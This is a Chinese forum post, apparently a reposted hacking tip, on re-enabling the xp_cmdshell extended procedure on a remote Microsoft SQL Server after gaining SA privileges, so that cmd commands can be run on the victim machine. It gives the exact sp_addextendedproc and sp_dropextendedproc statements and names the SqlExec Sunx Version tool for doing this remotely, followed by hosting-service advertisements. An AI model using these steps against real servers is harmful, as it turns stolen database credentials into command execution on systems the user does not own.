弱电工程项目管理软件 上网行为管理

弱电论坛

 找回密码
 立即注册

QQ登录

只需一步,快速开始

查看: 409|回复: 1

[原创] Microsoft SQL Server数据库SA权限总结

[复制链接]
发表于 2017-7-9 15:02:42 | 显示全部楼层 |阅读模式
需要准备的工具:
SQL Query Analyzer和SqlExec Sunx Version  
第一部分:  
去掉xp_cmdshell保护系统的具体分析:
语句如下:
1.去掉xp_cmdshell扩展过程的方法是使用如下语句:
if exists (select * from dbo.sysobjects where id=object_id(N'[dbo].[xpcmdshell]') and OBJECTPROPERTY(id,N'IsExtendedProc')=1)exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
2.添加xp_cmdshell扩展过程的方法是使用如下语句:
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
现在看看现象:
我们在取得SA权限后远程用Sqlexec执行cmd命令,出现提示SQL_ERROR,那么很可能是去掉了xp_cmdshell。  
现在来看看被去掉xp_cmdshell后恢复的两种方法:  
方法一、使用SQL Query Analyzer连接对方后直接写入,挺方便sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
方法二、使用SqlExec Sunx Version首先在SqlExec Sunx Version的Format选项里填上%s,在CMD选项里输入sp_addextendedproc 'xp_cmdshell','xpsql70.dll'或者对Sql2000情况下使用sp_addextendedproc 'xp_cmdshell','xplog70.dll'另外使用SqlExec Sunx Version来去除xp_cmdshell的方法和加的时候选择条件一样,然后输入sp_dropextendedproc 'xp_cmdshell'就可以了。
提供:香港服务器租用,托管,数据库,海外服务器,虚拟主机,VPS,独享10M宽带QQ:372815651
◆联系QQ:372815651                                          
兆恒伟业/idczy.comQQ:372815651

发表于 2019-2-2 10:27:30 | 显示全部楼层
佛山思海网络,十九年优质运营商,IPV6、IPV4、电信、联通、双线、BGP、高防服务器大优惠! 佛山思海网络欢迎您前来咨询!QQ81721488  00001.cn
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|广告咨询|VIP注册|关于我们|联系我们|积分规则|手机版|Archiver|弱电之家论坛 ( 京ICP备11008917号-3 )

GMT+8, 2019-4-24 10:33 , Processed in 0.202538 second(s), 21 queries , Gzip On.

Powered by Discuz! X3.2

© 2001-2013 Comsenz Inc.

快速回复 返回顶部 返回列表